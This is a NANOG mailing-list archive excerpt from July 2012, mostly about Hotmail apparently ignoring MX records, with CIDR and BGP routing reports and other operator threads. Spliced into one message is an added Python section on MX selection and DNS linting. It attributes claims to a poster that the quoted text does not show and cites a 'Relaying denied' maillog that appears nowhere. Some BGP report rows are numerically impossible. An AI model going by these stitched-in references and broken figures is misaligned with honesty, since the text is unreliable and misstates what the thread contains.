In-Reply-To: <20120726083535.GA13414@metron.com>
References: <20120726071441.GA11199@metron.com> <20120726083535.GA13414@metron.com>
Message-ID: <50111CA5.4090002@blakjak.net>

On 26/07/12 20:35, Lou Katz wrote:
> On Thu, Jul 26, 2012 at 02:38:31AM -0500, Jimmy Hess wrote:
>> On 7/26/12, Lou Katz wrote:
>>> One of my users has reported incoming mail failures, which I finally
>>> tracked down. It turned out that Hotmail has seen fit to send the mail
>>> to his domain's A record machine, despite the fact that he has valid MX
>>> records.
>> You looked in the mail headers and saw hotmail's mail server do that,
>> or the From address/return path just happens to be hotmail?
>> I would ask for a specific example of a domain name in which that
>> seems to happen, and exact DNS zone contents.
>>
>> I am sure that Hotmail does not ignore MX in general, unless they

No, they do. The exact same thing has happened to me - twice, with two separate scenarios being fundamentally similar.

The MX is ignored, the non-host A record is tried, if it accepts connections on Port 25 it uses this instead.

This behavior forced me to set up the mail server on the same box as a webserver I administer to act as a secondary MX for another domain I administer (mail is elsewhere), in one case. In the other, I had to simply write off the option of having http://domain working, and live with just http://www.domain, due to the use of a third party web host that also had an MTA on their machine that was rejecting my email.

Like all the behemoth service providers, it's impossible to find someone useful to talk to about these things. I posted on Mailop about it a few months ago, but it's not new behavior - the first instance I came across was more than 2 years ago.

Mark.
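Mark Foster describes the MX being skipped and the bare-domain A record tried instead, and Jimmy Hess lists DNS defects (MX to a CNAME, MX to a label that looks like an IP) that can leave an MX set unusable. The Python below is an added example, not code from the thread: it implements the MX selection rule of RFC 5321 section 5.1 beside the fall-back-to-A behaviour described above, and lints a constructed in-memory zone for those defects. All names under .example and all addresses are hypothetical.

```python
# Added example (not the thread's code): RFC 5321 section 5.1 MX selection
# next to the fall-back-to-A behaviour described above, plus lint checks for
# the MX defects named in the thread.  ZONE is a constructed in-memory zone;
# every name under .example and every address is hypothetical.
import ipaddress


class NoUsableMX(Exception):
    """MX RRs exist but none is usable: RFC 5321 says report an error."""


# owner name -> {rrtype: [rdata, ...]}; MX rdata is (preference, exchange)
ZONE = {
    "good.example.": {"MX": [(20, "mx2.good.example."), (10, "mx1.good.example.")],
                      "A": ["192.0.2.80"]},  # web server, should never see SMTP
    "mx1.good.example.": {"A": ["192.0.2.25"]},
    "mx2.good.example.": {"A": ["192.0.2.26"]},
    # no MX at all: the implicit-MX rule sends mail to the A record
    "nomx.example.": {"A": ["192.0.2.81"]},
    # MX exchange is a CNAME (forbidden by RFC 2181 section 10.3)
    "cname-mx.example.": {"MX": [(10, "mail.cname-mx.example.")], "A": ["192.0.2.82"]},
    "mail.cname-mx.example.": {"CNAME": ["mx1.good.example."]},
    # MX exchange has no address records at all
    "dead-mx.example.": {"MX": [(10, "mx.dead-mx.example.")], "A": ["192.0.2.83"]},
    # MX exchange is an IP literal dressed up as a label
    "iplit.example.": {"MX": [(10, "192.0.2.25.")], "A": ["192.0.2.84"]},
}


def lookup(name, rrtype):
    """Rdata list for (name, rrtype) from the constructed zone."""
    return ZONE.get(name, {}).get(rrtype, [])


def looks_like_ip_literal(label):
    """True when an MX exchange is really an IP address, not a hostname."""
    try:
        ipaddress.ip_address(label.rstrip("."))
        return True
    except ValueError:
        return False


def lint_mx(domain):
    """Findings for the thread's MX defects: CNAME, IP literal, no A/AAAA."""
    findings = []
    for pref, exchange in lookup(domain, "MX"):
        if looks_like_ip_literal(exchange):
            findings.append(f"MX {pref} {exchange}: exchange is an IP literal")
        elif lookup(exchange, "CNAME"):
            findings.append(f"MX {pref} {exchange}: exchange is a CNAME")
        elif not (lookup(exchange, "A") or lookup(exchange, "AAAA")):
            findings.append(f"MX {pref} {exchange}: exchange has no A/AAAA")
    return findings


def exchange_addresses(exchange):
    """Addresses of one MX exchange: a real hostname only, no CNAME, no IP literal."""
    if looks_like_ip_literal(exchange) or lookup(exchange, "CNAME"):
        return []
    return lookup(exchange, "A") + lookup(exchange, "AAAA")


def smtp_targets_rfc5321(domain):
    """Delivery addresses in the order an RFC 5321 client must try them:
    MX exchanges by preference; error if MX exist but none is usable;
    the domain's own address records only when there is no MX at all."""
    mx_set = lookup(domain, "MX")
    if not mx_set:
        return lookup(domain, "A") + lookup(domain, "AAAA")
    targets = []
    for _pref, exchange in sorted(mx_set, key=lambda rr: rr[0]):
        targets.extend(exchange_addresses(exchange))
    if not targets:
        raise NoUsableMX(f"{domain}: MX records exist but none is usable")
    return targets


def rfc5321_rejects(domain):
    """True when a compliant client reports an error instead of delivering."""
    try:
        smtp_targets_rfc5321(domain)
        return False
    except NoUsableMX:
        return True


def smtp_targets_fallback(domain):
    """The non-compliant behaviour reported in the thread: when the MX set
    yields nothing, try the domain's own A record (the web server's)."""
    try:
        return smtp_targets_rfc5321(domain)
    except NoUsableMX:
        return lookup(domain, "A") + lookup(domain, "AAAA")


if __name__ == "__main__":
    for name in ZONE:
        print(name, lint_mx(name), rfc5321_rejects(name), smtp_targets_fallback(name))
```

For the three defective zones a compliant client reports an error, while the fall-back client quietly connects to the bare-domain address, which is exactly the "Relaying denied" transaction seen on the web server's maillog above.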
From jared at puck.nether.net Thu Jul 26 06:33:16 2012
From: jared at puck.nether.net (Jared Mauch)
Date: Thu, 26 Jul 2012 07:33:16 -0400
Subject: Weekly Routing Table Report
In-Reply-To:
References: <201207201910.q6KJAkHr026414@thyme.rand.apnic.net> <36781.1342814676@turing-police.cc.vt.edu> <716F2E24-2A9C-411C-97D8-59C25003FB7A@spawar.navy.mil> <451C7E1E-7F98-44FD-8EB4-7F3F118E3261@puck.nether.net>
Message-ID: <1AC92773-7D56-4E50-8B69-A8AC33DF3959@puck.nether.net>

On Jul 25, 2012, at 10:16 PM, Geoff Huston wrote:

>
> On 21/07/2012, at 6:40 AM, Jared Mauch wrote:
>
>>
>> On Jul 20, 2012, at 4:30 PM, Ron Broersma wrote:
>>
>>>
>>> On Jul 20, 2012, at 1:04 PM, valdis.kletnieks at vt.edu wrote:
>>>> On Sat, 21 Jul 2012 05:10:41 +1000, Routing Analysis Role Account said:
>>>>> BGP routing table entries examined: 418048
>>>> So, whatever happened to that whole "the internet will catch fire when
>>>> we get to 280K routing table entries" or whatever it was? :)
>>>
>>> We added memory where we could, or bought bigger routers. The new (conventional wisdom) limit is 1M routes.
>>
>> I think you mean 512k IPv4 with 256k of IPv6 (taking double space).
>
> 512K of IPv4? That's getting close!

I know a few people had issues around the 256k barrier from tcam based platforms. Expect a lot of BGP instability as people react to 512k entries in their fib

From mjwise at kapu.net Thu Jul 26 08:53:24 2012
From: mjwise at kapu.net (Michael J Wise)
Date: Thu, 26 Jul 2012 06:53:24 -0700
Subject: Is Hotmail in the habit of ignoring MX records?
In-Reply-To: <20120726083535.GA13414@metron.com>
References: <20120726071441.GA11199@metron.com> <20120726083535.GA13414@metron.com>
Message-ID:

On Jul 26, 2012, at 1:35 AM, Lou Katz wrote:

> The domain is cookephoto.com

Why does mail.metron.com have MX records? And they're different.

$ host cookephoto.com
cookephoto.com has address 192.160.193.89
cookephoto.com mail is handled by 10 mail.metron.com.
cookephoto.com mail is handled by 12 mail2.metron.com.
cookephoto.com mail is handled by 15 mail.katz.com.

$ host mail.metron.com
mail.metron.com has address 192.160.193.14
mail.metron.com mail is handled by 10 mail.metron.com.
mail.metron.com mail is handled by 20 mail.katz.com.

$ host mail.katz.com
mail.katz.com has address 192.160.193.14

$ host mail2.metron.com
mail2.metron.com has address 209.204.189.91

$ host plaid.metron.com
plaid.metron.com has address 192.160.193.135

Normally, in my experience, the actual mail server doesn't have MX records as such, but...
Just seems 0dd.

Also, you say ...

> At the time of the transaction, nothing special was happening here, ...

Was anything strange happening with any of the DNS records for any of these domains in the past two days?

Aloha,
Michael.
--
"Please have your Internet License and Usenet Registration handy..."

From ryan at u13.net Thu Jul 26 09:05:55 2012
From: ryan at u13.net (Ryan Rawdon)
Date: Thu, 26 Jul 2012 09:05:55 -0500
Subject: Is Hotmail in the habit of ignoring MX records?
In-Reply-To: <20120726071441.GA11199@metron.com>
References: <20120726071441.GA11199@metron.com>
Message-ID: <6B5C60E0-7A00-4623-81DF-BB68A8B168E3@u13.net>

On Jul 26, 2012, at 2:14 AM, Lou Katz wrote:

> One of my users has reported incoming mail failures, which I finally
> tracked down. It turned out that Hotmail has seen fit to send the mail
> to his domain's A record machine, despite the fact that he has valid MX records.
>
> The A record points to my webserver, which does not normally accept mail
> for anyone. The mail server MX records are to an entirely different machine.
>
> Comments?
>
> Do I need more valium?

If you subscribe to http://mailop.org and look in the archives, you'll see a thread named '[mailop] Hotmail ignoring MX, going direct to @ IN A? ' from March of this year (which carries over into April). In this thread Mark Foster encounters the same issue, and upon investigation others (including myself) see it as well.
I found that we were having the same issue after users on Hotmail were forwarding us DSNs regarding messages that our mail server had never seen, however upon checking our web servers for that hostname we found connections and delivery attempts from Hotmail.

Additionally, quoted from Tony Finch in the mailop thread regarding 'what if your MXes are broken and it is just failing back to A':

If one or more MX RRs are found for a given name, SMTP systems MUST NOT utilize any address RRs associated with that name unless they are located using the MX RRs; the "implicit MX" rule above applies only if there are no MX records present. If MX records are present, but none of them are usable, this situation MUST be reported as an error.

No solution to the issue was found in the various forks of that thread, however one individual afflicted by this issue (the OP) seems to have resolved his specific issue with Hotmail by fixing his MX records to be in stricter compliance with RFCs and best practices (removed a CNAME) - that said, per the quote above Hotmail should not have been falling back to the A records or any other RRs for the hostname. The matter is still unresolved for us and presumably others on the list except for the OP.

>
> -=[L]=-
> --
>

From ryan at u13.net Thu Jul 26 09:10:15 2012
From: ryan at u13.net (Ryan Rawdon)
Date: Thu, 26 Jul 2012 09:10:15 -0500
Subject: Is Hotmail in the habit of ignoring MX records?
In-Reply-To:
References: <20120726071441.GA11199@metron.com>
Message-ID:

On Jul 26, 2012, at 2:21 AM, Suresh Ramasubramanian wrote:

> If the MX records are not responsive / timing out, they might be falling
> back to the A record.
>

Per RFC2821 (and later RFC5321):

If one or more MX RRs are found for a given name, SMTP systems MUST NOT utilize any address RRs associated with that name unless they are located using the MX RRs; the "implicit MX" rule above applies only if there are no MX records present. If MX records are present, but none of them are usable, this situation MUST be reported as an error.

So while it is possible they are doing this, they should not be.

Ryan

>
> --
> Suresh Ramasubramanian (ops.lists at gmail.com)

From gbonser at seven.com Thu Jul 26 11:12:24 2012
From: gbonser at seven.com (George Bonser)
Date: Thu, 26 Jul 2012 16:12:24 +0000
Subject: Is Hotmail in the habit of ignoring MX records?
In-Reply-To: <6B5C60E0-7A00-4623-81DF-BB68A8B168E3@u13.net>
References: <20120726071441.GA11199@metron.com> <6B5C60E0-7A00-4623-81DF-BB68A8B168E3@u13.net>
Message-ID: <596B74B410EE6B4CA8A30C3AF1A155EA09E962FE@RWC-MBX1.corp.seven.com>

> From: Ryan Rawdon
> Sent: Thursday, July 26, 2012 7:06 AM
> To: nanog at nanog.org
> Subject: Re: Is Hotmail in the habit of ignoring MX records?

> No solution to the issue was found in the various forks of that thread,
> however one individual afflicted by this issue (the OP) seems to have
> resolved his specific issue with Hotmail by fixing his MX records to be
> in stricter compliance with RFCs and best practices (removed a CNAME) -
> that said, per the quote above Hotmail should not have been falling
> back to the A records or any other RRs for the hostname.

I would say MX pointing to a CNAME instead of pointing to an A record is the #1 cause of intermittent mail delivery problems I have seen. Some MTAs seem to tolerate it, some don't.

G

From jhellenthal at dataix.net Thu Jul 26 11:20:51 2012
From: jhellenthal at dataix.net (Jason Hellenthal)
Date: Thu, 26 Jul 2012 12:20:51 -0400
Subject: IPv6 only streaming video
In-Reply-To: <1FE43E65-A102-4C2B-9B19-C7433A0CD309@huawei.com>
References: <262CA69F-EC5C-43A0-93AD-770A44B23D80@huawei.com> <3456240E-FFB1-4EAB-91B6-906D980F6AC1@lacnic.net> <1FE43E65-A102-4C2B-9B19-C7433A0CD309@huawei.com>
Message-ID: <20120726162050.GA78891@DataIX.net>

On Thu, Jul 26, 2012 at 04:48:48AM +0000, Tina TSOU wrote:
> Do u mean I am a cow? I stop breast feeding this year.
>
> Tina

ROGFLOL This is the best thing I have read yet this morning. Thanks for the laugh.

>
> On Jul 25, 2012, at 9:47 PM, "Randy Bush" wrote:
>
> >> I'm responsible for IPv6 deployment in my enterprise network, the
> >> users are my colleagues. In this context, I'm not vendor, not
> >> operator.
> >
> > i smell cows
>

--
- (2^(N-1)) JJH48-ARIN

From shortdudey123 at gmail.com Thu Jul 26 11:24:41 2012
From: shortdudey123 at gmail.com (Grant Ridder)
Date: Thu, 26 Jul 2012 11:24:41 -0500
Subject: Stuxnet
Message-ID:

Hi Everyone,

I realize most people already know the history of Stuxnet but i figured i would pass along an IEEE article that was just published.

http://spectrum.ieee.org/computing/networks/declarations-of-cyberwar

-Grant

From lou at metron.com Thu Jul 26 12:29:21 2012
From: lou at metron.com (Lou Katz)
Date: Thu, 26 Jul 2012 10:29:21 -0700
Subject: Is Hotmail in the habit of ignoring MX records?
In-Reply-To: <6B5C60E0-7A00-4623-81DF-BB68A8B168E3@u13.net>
References: <20120726071441.GA11199@metron.com> <6B5C60E0-7A00-4623-81DF-BB68A8B168E3@u13.net>
Message-ID: <20120726172921.GA32237@metron.com>

On Thu, Jul 26, 2012 at 09:05:55AM -0500, Ryan Rawdon wrote:
>
> On Jul 26, 2012, at 2:14 AM, Lou Katz wrote:
>
> > One of my users has reported incoming mail failures, which I finally
> > tracked down. It turned out that Hotmail has seen fit to send the mail
> > to his domain's A record machine, despite the fact that he has valid MX records.
> >
> > The A record points to my webserver, which does not normally accept mail
> > for anyone. The mail server MX records are to an entirely different machine.
> >
> > Comments?
> >
> > Do I need more valium?
>
>
> If you subscribe to http://mailop.org and look in the archives, you'll see a thread named '[mailop] Hotmail ignoring MX, going direct to @ IN A? ' from March of this year (which carries over into April). In this thread Mark Foster encounters the same issue, and upon investigation others (including myself) see it as well.
>

Ahh - I knew I had seen this before, but thought it was here (nanog) rather than on mailops.

I think I may try setting the A record for the domain to my mailserver, and letting the webserver there redirect the http requests. I dislike putting a webserver on the unadorned domain, but out there in the 'real' world, folks seem to have become accustomed to leaving off the 'www'.

Thanks for the replies; I'll take this over to mailops if there is any more to say.

The funny thing is that this behavior with respect to Hotmail has not affected any of the other couple of dozen domains with similar or identical configurations here. Oh, well.

-=[L]=-
--

From jason at lixfeld.ca Thu Jul 26 14:45:14 2012
From: jason at lixfeld.ca (Jason Lixfeld)
Date: Thu, 26 Jul 2012 15:45:14 -0400
Subject: Rate shaping in Active E FTTx networks
Message-ID:

Hi all,

I'm trying to gauge what operators are doing to handle per-subscriber Internet access PIR bandwidth in Active E FTTx networks. I presume operators would want to limit each subscriber to a certain PIR, but within that limit, do things like perform preferential treatment of interactive services like streaming video or Skype, etc., ahead of non-interactive services like FTP.

My impression is that a subscriber's physical access in these networks is exponentially larger than their allocated amount of Internet access. This would leave ample room on the physical access for other services like Voice and IPTV that might run on separate VLANs than the Internet access VLAN. That said, I doubt there's really that much of a concern about allocating PIR on these other service VLANs.
So in terms of PIR for Internet access, is there some magic box that sits between the various subscriber aggregation points and the core, which takes care of shaping the subscriber's Internet access PIR, while making sure that any preferential treatment of interactive services is performed? Is that a lot to ask for one box? The ridiculously deep buffers required in order to shape to PIR vs. police to it (because policing to a PIR is just plain ugly) and the requirements to perform any sort of preferential packet treatment above and beyond that seem like quite a lot to ask of one box. Am I wrong? Who might make a box like this, if it exists? And if not, what are folks using to achieve these results?

Thanks in advance for any insights.

From gih at apnic.net Thu Jul 26 15:54:58 2012
From: gih at apnic.net (Geoff Huston)
Date: Thu, 26 Jul 2012 20:54:58 -0000
Subject: [routing-wg] The Cidr Report
In-Reply-To: <201110142200.p9EM00ua002638@wattle.apnic.net>
References: <201110142200.p9EM00ua002638@wattle.apnic.net>
Message-ID:

From cidr-report at potaroo.net Thu Jul 26 19:40:12 2012
From: cidr-report at potaroo.net (cidr-report at potaroo.net)
Date: Fri, 27 Jul 2012 00:40:12 GMT
Subject: The Cidr Report
Message-ID: <201207270040.q6R0eCFW047528@wattle.apnic.net>

This report has been generated at Fri Jul 27 00:13:01 2012 AEST.
The report analyses the BGP Routing Table of AS2.0 router and generates a report on aggregation potential within the table.

Check http://www.cidr-report.org for a current version of this report.
Recent Table History
        Date      Prefixes    CIDR Agg
        20-07-12    419152      241935
        21-07-12    420802      243450
        22-07-12    420851      242316
        23-07-12    420929      242400
        24-07-12    420469      242764
        25-07-12    420742      242807
        26-07-12    420845      241935
        27-07-12    421258      243201

AS Summary
         41751  Number of ASes in routing system
         17450  Number of ASes announcing only one prefix
          3412  Largest number of prefixes announced by an AS
                AS7029 : WINDSTREAM - Windstream Communications Inc
     114212832  Largest address span announced by an AS (/32s)
                AS4134 : CHINANET-BACKBONE No.31,Jin-rong Street

Aggregation Summary
The algorithm used in this report proposes aggregation only when there is a precise match using the AS path, so as to preserve traffic transit policies. Aggregation is also proposed across non-advertised address space ('holes').

 --- 27Jul12 ---
ASnum    NetsNow NetsAggr  NetGain   % Gain   Description

Table     421434   243342   178092    42.3%   All ASes

AS6389      3384      190     3194    94.4%   BELLSOUTH-NET-BLK - BellSouth.net Inc.
AS17974     2267      456     1811    79.9%   TELKOMNET-AS2-AP PT Telekomunikasi Indonesia
AS7029      3412     1737     1675    49.1%   WINDSTREAM - Windstream Communications Inc
AS18566     2088      417     1671    80.0%   COVAD - Covad Communications Co.
AS28573     2046      472     1574    76.9%   NET Servicos de Comunicao S.A.
AS4766      2762     1295     1467    53.1%   KIXS-AS-KR Korea Telecom
AS10620     2030      606     1424    70.1%   Telmex Colombia S.A.
AS4323      1577      387     1190    75.5%   TWTC - tw telecom holdings, inc.
AS22773     1698      569     1129    66.5%   ASN-CXA-ALL-CCI-22773-RDC - Cox Communications Inc.
AS1785      1940      816     1124    57.9%   AS-PAETEC-NET - PaeTec Communications, Inc.
AS4755      1618      578     1040    64.3%   TATACOMM-AS TATA Communications formerly VSNL is Leading ISP
AS7303      1458      451     1007    69.1%   Telecom Argentina S.A.
AS7552      1128      225      903    80.1%   VIETEL-AS-AP Vietel Corporation
AS6458       881       45      836    94.9%   Telgua
AS8151      1473      666      807    54.8%   Uninet S.A. de C.V.
AS18101      942      157      785    83.3%   RELIANCE-COMMUNICATIONS-IN Reliance Communications Ltd.DAKC MUMBAI
AS17908      828       60      768    92.8%   TCISL Tata Communications
AS4808      1118      351      767    68.6%   CHINA169-BJ CNCGROUP IP network China169 Beijing Province Network
AS9394       908      166      742    81.7%   CRNET CHINA RAILWAY Internet(CRNET)
AS13977      839      123      716    85.3%   CTELCO - FAIRPOINT COMMUNICATIONS, INC.
AS855        694       52      642    92.5%   CANET-ASN-4 - Bell Aliant Regional Communications, Inc.
AS3356      1108      476      632    57.0%   LEVEL3 Level 3 Communications
AS17676      695       75      620    89.2%   GIGAINFRA Softbank BB Corp.
AS2118       632       14      618    97.8%   RELCOM-AS OOO "NPO Relcom"
AS22561     1035      424      611    59.0%   DIGITAL-TELEPORT - Digital Teleport Inc.
AS19262     1002      404      598    59.7%   VZGNI-TRANSIT - Verizon Online LLC
AS4780       834      243      591    70.9%   SEEDNET Digital United Inc.
AS24560     1037      449      588    56.7%   AIRTELBROADBAND-AS-AP Bharti Airtel Ltd., Telemedia Services
AS3549      1000      437      563    56.3%   GBLX Global Crossing Ltd.
AS4804       652       96      556    85.3%   MPX-AS Microplex PTY LTD

Total      43086    12437    30649    71.1%   Top 30 total

Possible Bogus Routes

Please see http://www.cidr-report.org for the full report

------------------------------------
Copies of this report are mailed to:
  nanog at nanog.org
  eof-list at ripe.net
  apops at apops.net
  routing-wg at ripe.net
  afnog at afnog.org

From cidr-report at potaroo.net Thu Jul 26 19:40:13 2012
From: cidr-report at potaroo.net (cidr-report at potaroo.net)
Date: Fri, 27 Jul 2012 00:40:13 GMT
Subject: BGP Update Report
Message-ID: <201207270040.q6R0eDO6047533@wattle.apnic.net>

BGP Update Report
Interval: 21-Jul-12 -to- 25-Jul-12 (4 days)
Observation Point: BGP Peering with AS131072

TOP 20 Unstable Origin AS
Rank  ASN        Upds    %   Upds/Pfx  AS-Name
 1 - AS8402     31474  1.4%     17.8 -- CORBINA-AS OJSC "Vimpelcom"
 2 - AS1637     30729  1.4%    284.5 -- DNIC-AS-01637 - Headquarters, USAISC
 3 - AS17813    29341  1.3%    215.7 -- MTNL-AP Mahanagar Telephone Nigam Ltd.
 4 - AS47931    25100  1.1%    204.1 -- ALENETWORK A.L.E. COM NETWORK S.R.L
 5 - AS9829     21569  0.9%     16.5 -- BSNL-NIB National Internet Backbone
 6 - AS24560    19759  0.9%     19.1 -- AIRTELBROADBAND-AS-AP Bharti Airtel Ltd., Telemedia Services
 7 - AS7029     15412  0.7%      4.4 -- WINDSTREAM - Windstream Communications Inc
 8 - AS7552     13226  0.6%     11.7 -- VIETEL-AS-AP Vietel Corporation
 9 - AS13118    11776  0.5%    245.3 -- ASN-YARTELECOM OJSC Rostelecom
10 - AS6458     11752  0.5%     13.3 -- Telgua
11 - AS27738    11509  0.5%     20.7 -- Ecuadortelecom S.A.
12 - AS48277    11271  0.5%    201.3 -- SOREX SOREX MEDIA S.R.L.
13 - AS49074    10768  0.5%    219.8 -- TECHNOLOGICAL SC TECHNOLOGICAL SRL
14 - AS6389     10345  0.5%      3.1 -- BELLSOUTH-NET-BLK - BellSouth.net Inc.
15 - AS28573     9562  0.4%      4.7 -- NET Servicos de Comunicao S.A.
16 - AS10620     9514  0.4%      4.7 -- Telmex Colombia S.A.
17 - AS5800      8667  0.4%     33.6 -- DNIC-ASBLK-05800-06055 - DoD Network Information Center
18 - AS4766      8347  0.4%      3.0 -- KIXS-AS-KR Korea Telecom
19 - AS8151      8307  0.4%      5.6 -- Uninet S.A. de C.V.
20 - AS43875     8261  0.4%    206.5 -- DATAINFO-ASN SC Data Media Info SRL

TOP 20 Unstable Origin AS (Updates per announced prefix)
Rank  ASN        Upds    %   Upds/Pfx  AS-Name
 1 - AS16535     3364  0.1%   1121.3 -- ECHOS-3 - Echostar Holding Purchasing Corporation
 2 - AS44410     2654  0.1%    884.7 -- ENTEKHAB-AS ENTEKHAB INDUSTRIAL GROUP
 3 - AS43348     1752  0.1%    876.0 -- TATARINOVA-AS PE Tatarinova Alla Ivanovna
 4 - AS49072      837  0.0%    837.0 -- APSUARA-AS TCA Apsuara Ltd.
 5 - AS54037      770  0.0%    770.0 -- CAREER-GROUP-INC - CAREER GROUP INC
 6 - AS14452     6312  0.3%    701.3 -- IOS-ASN - INTERNET OF THE SANDHILLS
 7 - AS26184      645  0.0%    645.0 -- ASA-HQAS - American Society of Anesthesiologists
 8 - AS58655     1160  0.1%    580.0 -- SKYTEL6-BD SkyTel Communications Limited
 9 - AS51250      552  0.0%    552.0 -- ITE-PROTON-AS "Information technologies enterprise "Proton" LTD
10 - AS3          440  0.0%    759.0 -- RESENNET-AS ResenNet Aps
11 - AS42806      411  0.0%    411.0 -- TELECOM-AS Telecom Georgia
12 - AS38857      775  0.0%    387.5 -- ESOFT-TRANSIT-AS-AP e.Soft Technologies Ltd.
13 - AS23007 888 0.0% 296.0 -- Universidad de Los Andes
14 - AS4 296 0.0% 51.0 -- COMUNICALO DE MEXICO S.A. DE C.V
15 - AS27890 576 0.0% 288.0 -- Universidad de Oriente
16 - AS1637 30729 1.4% 284.5 -- DNIC-AS-01637 - Headquarters, USAISC
17 - AS23237 1117 0.1% 279.2 -- MCMASTER - McMaster University
18 - AS29398 277 0.0% 277.0 -- PETROBALTIC "Petrobaltic" S.A.
19 - AS34744 5440 0.2% 247.3 -- GVM S.C. GVM SISTEM 2003 S.R.L.
20 - AS50704 1723 0.1% 246.1 -- BENEFIC-INTERNET Benefic Consult SRL

TOP 20 Unstable Prefixes
Rank Prefix Upds % Origin AS -- AS Name
 1 - 109.161.64.0/19 11364 0.5% AS13118 -- ASN-YARTELECOM OJSC Rostelecom
 2 - 59.176.0.0/14 6407 0.3% AS17813 -- MTNL-AP Mahanagar Telephone Nigam Ltd.
 3 - 182.64.0.0/16 6060 0.3% AS24560 -- AIRTELBROADBAND-AS-AP Bharti Airtel Ltd., Telemedia Services
 4 - 122.161.0.0/16 6034 0.3% AS24560 -- AIRTELBROADBAND-AS-AP Bharti Airtel Ltd., Telemedia Services
 5 - 200.46.0.0/19 5790 0.2% AS21599 -- NETDIRECT S.A.
 6 - 59.177.0.0/16 4822 0.2% AS17813 -- MTNL-AP Mahanagar Telephone Nigam Ltd.
 7 - 202.56.215.0/24 3646 0.1% AS24560 -- AIRTELBROADBAND-AS-AP Bharti Airtel Ltd., Telemedia Services
 8 - 67.47.194.0/23 3358 0.1% AS16535 -- ECHOS-3 - Echostar Holding Purchasing Corporation
 9 - 59.177.0.0/18 3349 0.1% AS17813 -- MTNL-AP Mahanagar Telephone Nigam Ltd.
10 - 123.252.208.0/24 3197 0.1% AS17762 -- HTIL-TTML-IN-AP Tata Teleservices Maharashtra Ltd
11 - 59.177.48.0/20 3103 0.1% AS17813 -- MTNL-AP Mahanagar Telephone Nigam Ltd.
12 - 139.139.19.0/24 3086 0.1% AS1562 -- DNIC-ASBLK-01550-01601 - DoD Network Information Center
13 - 194.63.9.0/24 2924 0.1% AS1273 -- CW Cable and Wireless Worldwide plc
14 - 65.82.30.0/24 2511 0.1% AS6197 -- BATI-ATL - BellSouth Network Solutions, Inc
15 - 69.38.178.0/24 2427 0.1% AS19406 -- TWRS-MA - Towerstream I, Inc.
16 - 115.170.128.0/17 1829 0.1% AS4847 -- CNIX-AP China Networks Inter-Exchange
17 - 59.177.0.0/19 1819 0.1% AS17813 -- MTNL-AP Mahanagar Telephone Nigam Ltd.
18 - 59.177.64.0/18 1695 0.1% AS17813 -- MTNL-AP Mahanagar Telephone Nigam Ltd.
19 - 59.177.144.0/20 1630 0.1% AS17813 -- MTNL-AP Mahanagar Telephone Nigam Ltd.
20 - 78.111.6.0/23 1575 0.1% AS44410 -- ENTEKHAB-AS ENTEKHAB INDUSTRIAL GROUP

Details at http://bgpupdates.potaroo.net

------------------------------------
Copies of this report are mailed to:
  nanog at nanog.org
  eof-list at ripe.net
  apops at apops.net
  routing-wg at ripe.net
  afnog at afnog.org


From marka at isc.org Thu Jul 26 20:34:10 2012
From: marka at isc.org (Mark Andrews)
Date: Fri, 27 Jul 2012 11:34:10 +1000
Subject: Is Hotmail in the habit of ignoring MX records?
In-Reply-To: Your message of "Thu, 26 Jul 2012 06:53:24 MST."
References: <20120726071441.GA11199@metron.com> <20120726083535.GA13414@metron.com>
Message-ID: <20120727013411.A55B12311FA5@drugs.dv.isc.org>

In message , Michael J Wise writes:
>
> On Jul 26, 2012, at 1:35 AM, Lou Katz wrote:
>
> > The domain is cookephoto.com
>
> Why does mail.metron.com have MX records?

Why do you care? There is nothing wrong with having explicit MX
records and they generally take up less room in a DNS cache than
the negative response does especially if it is DNSSEC signed.

> And they're different.

Again why do you care?

> $ host cookephoto.com
> cookephoto.com has address 192.160.193.89
> cookephoto.com mail is handled by 10 mail.metron.com.
> cookephoto.com mail is handled by 12 mail2.metron.com.
> cookephoto.com mail is handled by 15 mail.katz.com.
>
> $ host mail.metron.com
> mail.metron.com has address 192.160.193.14
> mail.metron.com mail is handled by 10 mail.metron.com.
> mail.metron.com mail is handled by 20 mail.katz.com.
>
> $ host mail.katz.com
> mail.katz.com has address 192.160.193.14
>
> $ host mail2.metron.com
> mail2.metron.com has address 209.204.189.91
>
> $ host plaid.metron.com
> plaid.metron.com has address 192.160.193.135
>
> Normally, in my experience, the actual mail server doesn't have MX
> records as such, but….
> Just seems 0dd.
All address records (A and AAAA) have MX records. Some may be
implicit but as far as SMTP is concerned they all have MX records.

> Also, you say …
>
> > At the time of the transaction, nothing special was happening here,
> ...
>
> Was anything strange happening with any of the DNS records for any of
> these domains in the past two days?
>
> Aloha,
> Michael.
> --
> "Please have your Internet License
> and Usenet Registration handy..."
--
Mark Andrews, ISC
1 Seymour St., Dundas Valley, NSW 2117, Australia
PHONE: +61 2 9871 4742 INTERNET: marka at isc.org


From mjwise at kapu.net Thu Jul 26 21:28:47 2012
From: mjwise at kapu.net (Michael J Wise)
Date: Thu, 26 Jul 2012 19:28:47 -0700
Subject: Is Hotmail in the habit of ignoring MX records?
In-Reply-To: <20120727013411.A55B12311FA5@drugs.dv.isc.org>
References: <20120726071441.GA11199@metron.com> <20120726083535.GA13414@metron.com> <20120727013411.A55B12311FA5@drugs.dv.isc.org>
Message-ID:

On Jul 26, 2012, at 6:34 PM, Mark Andrews wrote:

> In message , Michael J Wise writes:
>>
>> On Jul 26, 2012, at 1:35 AM, Lou Katz wrote:
>>
>>> The domain is cookephoto.com
>>
>> Why does mail.metron.com have MX records?
>
> Why do you care? There is nothing wrong with having explicit MX
> records and they generally take up less room in a DNS cache than
> the negative response does especially if it is DNSSEC signed.
>
>> And they're different.
>
> Again why do you care?

Why do *I* care?
I don't.

I'm just trying to find the weird bit that maybe is causing hotmail to stumble.
And maybe an endless loop for an MX lookup might be what is causing hotmail to panic and throw out the MX records.

>> $ host cookephoto.com
>> cookephoto.com has address 192.160.193.89
>> cookephoto.com mail is handled by 10 mail.metron.com.
>> cookephoto.com mail is handled by 12 mail2.metron.com.
>> cookephoto.com mail is handled by 15 mail.katz.com.
>>
>> $ host mail.metron.com
>> mail.metron.com has address 192.160.193.14
>> mail.metron.com mail is handled by 10 mail.metron.com.
>> mail.metron.com mail is handled by 20 mail.katz.com.
>>
>> $ host mail.katz.com
>> mail.katz.com has address 192.160.193.14
>>
>> $ host mail2.metron.com
>> mail2.metron.com has address 209.204.189.91
>>
>> $ host plaid.metron.com
>> plaid.metron.com has address 192.160.193.135
>>
>> Normally, in my experience, the actual mail server doesn't have MX
>> records as such, but….
>> Just seems 0dd.
>
> All address records (A and AAAA) have MX records. Some may be
> implicit but as far as SMTP is concerned they all have MX records.
>
>> Also, you say …
>>
